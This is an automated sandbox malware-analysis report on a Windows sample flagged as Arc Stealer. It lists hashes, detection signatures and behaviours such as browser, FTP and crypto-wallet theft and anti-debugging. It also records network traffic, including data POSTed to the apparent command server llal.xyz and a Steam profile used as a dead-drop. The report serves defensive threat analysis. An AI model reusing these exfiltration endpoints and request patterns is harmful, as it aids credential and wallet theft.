Windows Analysis Report
0x001900000002ab40-59.exe

Overview

General Information

Sample name: 0x001900000002ab40-59.exe
Analysis ID: 1450268
MD5: 889cc88bca04e05c46d9e74636baee19
SHA1: 28a273447716b7dea5526a499b801d025ac3ea6e
SHA256: 00aac20f7fa77d5b959244157aad331bcdd28e3c4240e4a7106848625824fa78
Tags: exe
Infos:

Detection

Arc Stealer
Score: 88
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Yara detected Arc Stealer
AI detected suspicious sample
Found many strings related to Crypto-Wallets (likely being stolen)
Performs DNS queries to domains with low reputation
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
PE / OLE file has an invalid certificate
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • 0x001900000002ab40-59.exe (PID: 7584 cmdline: "C:\Users\user\Desktop\0x001900000002ab40-59.exe" MD5: 889CC88BCA04E05C46D9E74636BAEE19)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
00000001.00000003.1722897393.0000000008297000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
00000001.00000002.1724281527.0000000005A64000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
00000001.00000003.1722996754.00000000082AB000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
00000001.00000002.1725697054.00000000082AE000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
00000001.00000002.1724191152.0000000005940000.00000040.00001000.00020000.00000000.sdmp | Windows_Trojan_Donutloader_f40e3759 | unknown | unknown | 0x5f271:$x86: 04 75 EE 89 31 F0 FF 46 04 33 C0 EB

Source | Rule | Description | Author | Strings
1.2.0x001900000002ab40-59.exe.5942544.1.unpack | Windows_Trojan_Donutloader_f40e3759 | unknown | unknown | 0x59b2d:$x86: 04 75 EE 89 31 F0 FF 46 04 33 C0 EB
1.2.0x001900000002ab40-59.exe.5942544.1.raw.unpack | Windows_Trojan_Donutloader_f40e3759 | unknown | unknown | 0x5cd2d:$x86: 04 75 EE 89 31 F0 FF 46 04 33 C0 EB

No Sigma rule has matched
No Snort rule has matched

AV Detection

Source: 0x001900000002ab40-59.exe | Virustotal: Detection: 19%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 97.6% probability
Source: 0x001900000002ab40-59.exe | Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
Source: unknown | HTTPS traffic detected: 104.102.42.29:443 -> 192.168.2.10:49708 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.10:49709 version: TLS 1.2
Source: 0x001900000002ab40-59.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
Source: Binary string: C:\BuildAgent\work\6a6d135591f2f49f\src\out\Default\win_clang_x86\lite_installer.exe.pdb source: 0x001900000002ab40-59.exe
Source: C:\Users\user\Desktop\0x001900000002ab40-59.exe | Code function: 1_2_009232F1 FindFirstFileExW, 1_2_009232F1
Source: C:\Users\user\Desktop\0x001900000002ab40-59.exe | Code function: 1_2_009233A5 FindFirstFileExW, FindNextFileW, FindClose, FindClose, 1_2_009233A5
Source: C:\Users\user\Desktop\0x001900000002ab40-59.exe | Code function: 1_2_008CD950 FindFirstFileExW, GetLastError, GetFileAttributesW, FindNextFileW, FindClose, 1_2_008CD950
Source: C:\Users\user\Desktop\0x001900000002ab40-59.exe | Code function: 1_2_0089F490 GetLogicalDriveStringsW, QueryDosDeviceW, 1_2_0089F490
Source: C:\Users\user\Desktop\0x001900000002ab40-59.exe | Code function: 4x nop then movd mm0, dword ptr [edx] 1_2_00824577

Networking

Source: DNS query: llal.xyz
Source: Joe Sandbox View | IP Address: 188.114.97.3
Source: Joe Sandbox View | IP Address: 104.102.42.29
Source: Joe Sandbox View | ASN Name: CLOUDFLARENETUS
Source: Joe Sandbox View | JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: global traffic | HTTP traffic detected: GET /profiles/76561199619938930 HTTP/1.1 | User-Agent: Mozilla/5.0 (Linux x86_64) AppleWebKit/600.48 (KHTML, like Gecko) Chrome/50.0.2598.249 Safari/603 | Host: steamcommunity.com | Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: GET /ujs/2ae977f4-db12-4876-9e4d-fc8d1778842d HTTP/1.1 | User-Agent: Mozilla/5.0 (Linux x86_64) AppleWebKit/600.48 (KHTML, like Gecko) Chrome/50.0.2598.249 Safari/603 | Host: llal.xyz | Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: POST /Up/b HTTP/1.1 | Content-Type: application/octet-stream; boundary=---- | User-Agent: Mozilla/5.0 (Linux x86_64) AppleWebKit/600.48 (KHTML, like Gecko) Chrome/50.0.2598.249 Safari/603 | Host: llal.xyz | Content-Length: 7745 | Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: POST /Up/b HTTP/1.1 | Content-Type: application/octet-stream; boundary=---- | User-Agent: Mozilla/5.0 (Linux x86_64) AppleWebKit/600.48 (KHTML, like Gecko) Chrome/50.0.2598.249 Safari/603 | Host: llal.xyz | Content-Length: 11629 | Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: POST /Up/b HTTP/1.1 | Content-Type: application/octet-stream; boundary=---- | User-Agent: Mozilla/5.0 (Linux x86_64) AppleWebKit/600.48 (KHTML, like Gecko) Chrome/50.0.2598.249 Safari/603 | Host: llal.xyz | Content-Length: 9177 | Cache-Control: no-cache
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic | DNS traffic detected: DNS query: steamcommunity.com
Source: global traffic | DNS traffic detected: DNS query: llal.xyz
Source: unknown | HTTP traffic detected: POST /Up HTTP/1.1 | Content-Type: application/octet-stream; boundary=---- | User-Agent: MyApp/1.0 | Host: llal.xyz | Content-Length: 343 | Cache-Control: no-cache
          Source: 76561199619938930[1].htm.1.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/motiva_sans.css?v=-DH0xTYpnVe2&l=engl
          Source: 0x001900000002ab40-59.exe, 00000001.00000003.1633465280.0000000005A6E000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1633506996.0000000005A64000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000002.1724281527.0000000005A64000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1633436838.0000000005AB3000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1647321556.0000000005A64000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.1.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/shared_global.css?v=MO4-iGQJS3Kg&l=en
          Source: 0x001900000002ab40-59.exe, 00000001.00000003.1633465280.0000000005A6E000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1633506996.0000000005A64000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000002.1724281527.0000000005A64000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1633436838.0000000005AB3000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1647321556.0000000005A64000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.1.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/shared_responsive.css?v=sHIIcMzCffX6&
          Source: 0x001900000002ab40-59.exe, 00000001.00000003.1633436838.0000000005AB3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/header/logo_steam.svg?t=96201
          Source: 0x001900000002ab40-59.exe, 00000001.00000003.1633465280.0000000005A6E000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1633436838.0000000005AB3000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.1.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016
          Source: 0x001900000002ab40-59.exe, 00000001.00000003.1633465280.0000000005A6E000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1633436838.0000000005AB3000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.1.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/responsive/header_logo.png
          Source: 0x001900000002ab40-59.exe, 00000001.00000003.1633465280.0000000005A6E000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1633436838.0000000005AB3000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.1.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png
          Source: 0x001900000002ab40-59.exe, 00000001.00000003.1633465280.0000000005A6E000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1633436838.0000000005AB3000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.1.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png
          Source: 0x001900000002ab40-59.exe, 00000001.00000003.1633465280.0000000005A6E000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1633436838.0000000005AB3000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.1.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/shared_global.js?v=REEGJU1hwkYl&am
          Source: 0x001900000002ab40-59.exe, 00000001.00000003.1633465280.0000000005A6E000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1633436838.0000000005AB3000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.1.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=pSv
          Source: 0x001900000002ab40-59.exe, 00000001.00000003.1633465280.0000000005A6E000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1633506996.0000000005A64000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000002.1724281527.0000000005A64000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1633436838.0000000005AB3000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1647321556.0000000005A64000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.1.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt0
          Source: 0x001900000002ab40-59.exe, 00000001.00000003.1712081694.0000000008357000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1712269375.000000000835A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/5b4DH7KHAf2n_mNaLjNi1-UAoKmM9rhqaA9w7FyznHo.10943.jpg
          Source: 0x001900000002ab40-59.exe, 00000001.00000003.1712081694.0000000008357000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1712269375.000000000835A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
          Source: 0x001900000002ab40-59.exeString found in binary or memory: https://crash-reports.browser.yandex.net/submit
          Source: 0x001900000002ab40-59.exe, 00000001.00000000.1519545162.0000000000933000.00000002.00000001.01000000.00000003.sdmp, 0x001900000002ab40-59.exe, 00000001.00000002.1723224963.0000000000933000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://crash-reports.browser.yandex.net/submit~S
          Source: 0x001900000002ab40-59.exeString found in binary or memory: https://crash-reports.browser.yandex.net/submit~SRxTRhSRx%R
          Source: 0x001900000002ab40-59.exeString found in binary or memory: https://download.cdn.yandex.net/browser-partners/_xp_builds/browser-setup.arc
          Source: 0x001900000002ab40-59.exeString found in binary or memory: https://download.cdn.yandex.net/browser-partners/_xp_builds/browser-setup.arcGetDownloadUrlsFromBran
          Source: 0x001900000002ab40-59.exeString found in binary or memory: https://download.cdn.yandex.net/browser/
          Source: 0x001900000002ab40-59.exeString found in binary or memory: https://download.cdn.yandex.net/browser/installer/
          Source: 0x001900000002ab40-59.exeString found in binary or memory: https://download.cdn.yandex.net/browser/installer/alice/scenarios/
          Source: 0x001900000002ab40-59.exeString found in binary or memory: https://download.cdn.yandex.net/browser/installer/alice/scenarios//browser-setup.archttps://download
          Source: 0x001900000002ab40-59.exeString found in binary or memory: https://download.cdn.yandex.net/browser/installer/ybLocal
          Source: 0x001900000002ab40-59.exeString found in binary or memory: https://download.cdn.yandex.net/browser/win7/
          Source: 0x001900000002ab40-59.exeString found in binary or memory: https://download.cdn.yandex.net/browser/win7//browser-setup.arc..
          Source: 0x001900000002ab40-59.exe, 00000001.00000003.1670010491.0000000008324000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
          Source: 0x001900000002ab40-59.exe, 00000001.00000003.1670010491.0000000008324000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
          Source: 0x001900000002ab40-59.exe, 00000001.00000003.1670010491.0000000008324000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
          Source: 0x001900000002ab40-59.exe, 00000001.00000003.1633506996.0000000005A5E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://help.steampowered.com/
          Source: 0x001900000002ab40-59.exe, 00000001.00000003.1633465280.0000000005A6E000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1633436838.0000000005AB3000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.1.drString found in binary or memory: https://help.steampowered.com/en/
          Source: 0x001900000002ab40-59.exe, 00000001.00000002.1724191152.0000000005940000.00000040.00001000.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000002.1724819264.0000000005E30000.00000004.00001000.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000002.1725040619.0000000007676000.00000002.10000000.00040000.00000000.sdmpString found in binary or memory: https://https://t.me/asdfghjrrewqqqqtfg/ujs/WorldHellostrwvfncexGostrbrCHbrGkunknownftpac/Up/gltype
          Source: 0x001900000002ab40-59.exe, 00000001.00000003.1712269375.000000000835A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pqrfQHr4pbW4ZbWfpbY7ReNxR3UIG8zInwYIFIVs9eYi
          Source: 0x001900000002ab40-59.exe, 00000001.00000003.1633465280.0000000005A6E000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1646905616.0000000005A75000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000002.1724281527.0000000005A64000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1647075148.0000000005A78000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://llal.xyz
          Source: 0x001900000002ab40-59.exe, 00000001.00000003.1722573183.0000000008297000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1670243798.0000000008290000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1647075148.0000000005A78000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1658364365.0000000008290000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://llal.xyz/
          Source: 0x001900000002ab40-59.exe, 00000001.00000002.1725640597.000000000829E000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1712291354.0000000008291000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1722484948.0000000008297000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1722436058.0000000008291000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1722897393.0000000008297000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1722573183.0000000008297000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://llal.xyz/)
          Source: 0x001900000002ab40-59.exe, 00000001.00000002.1725640597.000000000829E000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1712291354.0000000008291000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1722484948.0000000008297000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1722436058.0000000008291000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1722897393.0000000008297000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1722573183.0000000008297000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://llal.xyz//
          Source: 0x001900000002ab40-59.exe, 00000001.00000002.1725640597.000000000829E000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1722484948.0000000008297000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1722436058.0000000008291000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1722897393.0000000008297000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1722573183.0000000008297000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://llal.xyz/D
          Source: 0x001900000002ab40-59.exe, 00000001.00000003.1646905616.0000000005A75000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000002.1724281527.0000000005A64000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1647075148.0000000005A78000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://llal.xyz/U6
          Source: 0x001900000002ab40-59.exe, 00000001.00000002.1724281527.00000000059FC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://llal.xyz/Up
          Source: 0x001900000002ab40-59.exe, 00000001.00000003.1722484948.0000000008297000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1722436058.0000000008291000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1722517315.00000000082A3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://llal.xyz/Up/b
          Source: 0x001900000002ab40-59.exe, 00000001.00000003.1691573716.0000000008291000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1712291354.0000000008291000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1723012989.00000000082A0000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1722484948.0000000008297000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1722436058.0000000008291000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1722517315.00000000082A3000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1722897393.0000000008297000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1722622099.00000000082A7000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000002.1725668402.00000000082A1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://llal.xyz/Up/b/
          Source: 0x001900000002ab40-59.exe, 00000001.00000003.1691573716.0000000008291000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1712291354.0000000008291000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1723012989.00000000082A0000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1722484948.0000000008297000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1722436058.0000000008291000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1722517315.00000000082A3000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1722897393.0000000008297000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1722622099.00000000082A7000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000002.1725668402.00000000082A1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://llal.xyz/Up/b6
          Source: 0x001900000002ab40-59.exe, 00000001.00000003.1722436058.0000000008291000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://llal.xyz/Up/bZ
          Source: 0x001900000002ab40-59.exe, 00000001.00000003.1722484948.0000000008297000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1722436058.0000000008291000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1722517315.00000000082A3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://llal.xyz/Up/bk
          Source: 0x001900000002ab40-59.exe, 00000001.00000002.1724281527.00000000059FC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://llal.xyz/Upx
          Source: 0x001900000002ab40-59.exe, 00000001.00000003.1646905616.0000000005A75000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1647075148.0000000005A78000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://llal.xyz/s
          Source: 0x001900000002ab40-59.exe, 00000001.00000003.1646905616.0000000005A75000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1647075148.0000000005A78000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://llal.xyz/u
          Source: 0x001900000002ab40-59.exe, 00000001.00000003.1646905616.0000000005A75000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000002.1724281527.0000000005A64000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1647075148.0000000005A78000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1647321556.0000000005A64000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://llal.xyz/ujs/2ae977f4-db12-4876-9e4d-fc8d1778842d
          Source: 0x001900000002ab40-59.exe, 00000001.00000003.1646905616.0000000005A75000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000002.1724281527.0000000005A64000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1647075148.0000000005A78000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://llal.xyz/ujs/2ae977f4-db12-4876-9e4d-fc8d1778842d2
          Source: 0x001900000002ab40-59.exe, 00000001.00000003.1646905616.0000000005A75000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1647075148.0000000005A78000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://llal.xyz/ujs/2ae977f4-db12-4876-9e4d-fc8d1778842d;
          Source: 0x001900000002ab40-59.exe, 00000001.00000003.1646905616.0000000005A75000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000002.1724281527.0000000005A64000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1647075148.0000000005A78000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://llal.xyz/ujs/2ae977f4-db12-4876-9e4d-fc8d1778842dU3
          Source: 0x001900000002ab40-59.exe, 00000001.00000003.1633506996.0000000005A5E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.steampowered.com/
          Source: 0x001900000002ab40-59.exe, 00000001.00000003.1633024645.0000000005A79000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1633465280.0000000005A6E000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1633506996.0000000005A4D000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1633506996.0000000005A5E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lv.queniujq.cn
          Source: 0x001900000002ab40-59.exe, 00000001.00000003.1633024645.0000000005A79000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1633465280.0000000005A6E000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1633506996.0000000005A4D000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1633506996.0000000005A5E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://medal.tv
          Source: 0x001900000002ab40-59.exe, 00000001.00000003.1633024645.0000000005A79000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1633465280.0000000005A6E000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1633506996.0000000005A4D000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1633506996.0000000005A5E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://player.vimeo.com
          Source: 0x001900000002ab40-59.exe, 00000001.00000003.1633024645.0000000005A79000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1633465280.0000000005A6E000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1633506996.0000000005A4D000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1633506996.0000000005A5E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://recaptcha.net
          Source: 0x001900000002ab40-59.exe, 00000001.00000003.1633024645.0000000005A79000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1633465280.0000000005A6E000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1633506996.0000000005A4D000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1633506996.0000000005A5E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://recaptcha.net/recaptcha/;
          Source: 0x001900000002ab40-59.exe, 00000001.00000003.1633024645.0000000005A79000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1633465280.0000000005A6E000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1633506996.0000000005A4D000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1633506996.0000000005A5E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://s.ytimg.com;
          Source: 0x001900000002ab40-59.exe, 00000001.00000003.1633024645.0000000005A79000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1633465280.0000000005A6E000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1633506996.0000000005A4D000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1633506996.0000000005A5E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sketchfab.com
          Source: 0x001900000002ab40-59.exe, 00000001.00000003.1633024645.0000000005A79000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1633465280.0000000005A6E000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1633506996.0000000005A4D000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1633506996.0000000005A5E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steam.tv/
